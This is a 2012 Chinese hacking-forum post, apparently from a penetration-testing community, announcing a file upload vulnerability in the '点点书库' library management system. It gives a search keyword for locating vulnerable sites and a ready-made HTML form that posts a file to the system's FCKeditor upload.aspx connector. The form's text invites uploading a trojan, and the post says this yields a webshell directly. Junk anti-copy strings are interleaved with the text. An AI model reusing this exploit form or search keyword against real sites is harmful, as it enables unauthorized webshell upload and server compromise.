中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
1 x7 V1 ^. |/ ]) z; R
作者:冰锋刺客
( i _% x# K7 i' f& D
厂商:点击书(dianjishu.com)
$ ^6 `- M+ ^4 h% K" m: F9 e
日期:2012-6-21
: @+ l. A: a" a: ~: f- S% L- J' ]
" v1 V2 O2 g. q; F& G$ n3 n
I 概述
% _) K3 K; s- F/ c! g
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
8 } ?# o+ }5 k+ `4 ?) k; b1 z
II 简介
( P: \2 P- r# o# \4 ^
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
( i/ S, I7 S. Q7 ]( C' X: @4 v
补充一个漏洞
: F) F$ J- s& U& t; [9 S
<form id="frmUpload" enctype="multipart/form-data"
0 p8 {9 Z' O- d4 t: ]( @0 i" U
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
y: s0 L% d* P! W$ y% `
<input id="btnUpload" type="submit" value="操翻他">
2 u, ~# ~. {% H) z: X, C
</form>
3 H- g6 r& d2 y5 ?# |* S
你们懂的
; g# Z0 p; ^6 \! n" l5 z, w
那傻逼提供还需要改包.
9 K: @7 b6 ~3 e% K* C
自己看了下源代码发现fckeditor
6 C+ X0 g C) T# Z
直接秒杀
8 F5 s g2 O' U
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2